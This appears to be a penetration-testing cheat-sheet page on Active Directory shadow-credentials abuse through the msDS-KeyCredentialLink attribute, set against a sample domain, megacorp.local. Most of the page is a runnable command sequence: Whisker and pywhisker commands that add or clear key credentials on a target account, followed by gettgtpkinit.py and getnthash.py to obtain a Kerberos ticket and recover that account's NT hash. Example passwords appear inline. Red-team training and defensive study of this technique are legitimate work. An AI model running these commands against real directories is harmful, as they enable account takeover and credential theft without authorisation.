Key Credentials Abuse
"...if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user." (Elad Shamir, ref)
That makes GenericWrite on a user effectively equal to DCSync right on that user.

DSInternals

Whisker

List all the values of the the msDS-KeyCredentialLink attribute of a target object:
Cmd > .\Whisker.exe list /target:ws01$ /domain:megacorp.local /dc:DC1.megacorp.local
Add a new value to the msDS-KeyCredentialLink attribute of a target object:
Cmd > .\Whisker.exe add /target:ws01$ /domain:megacorp.local /dc:DC1.megacorp.local /path:C:\Temp\cert.pfx /password:Passw0rd!
Remove a value from the msDS-KeyCredentialLink attribute of a target object:
Cmd > .\Whisker.exe remove /target:ws01$ /domain:megacorp.local /dc:DC1.megacorp.local /remove:00ff00ff-00ff-00ff-00ff-00ff00ff00ff
Clear all the values of the the msDS-KeyCredentialLink attribute of a target object:
Cmd > .\Whisker.exe clear /target:ws01$ /domain:megacorp.local /dc:DC1.megacorp.local

pywhisker

$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action add -f sqltest_cert
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action clear
$ python3 gettgtpkinit.py megacorp.local/sqltest -cert-pfx ~/tools/pywhisker/sqltest_cert.pfx -pfx-pass 3Dc3Er0rst2e9J1yRtjh sqltest.ccache
$ KRB5CCNAME=sqltest.ccache python3 getnthash.py megacorp.local/sqltest -key 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
Last modified 9mo ago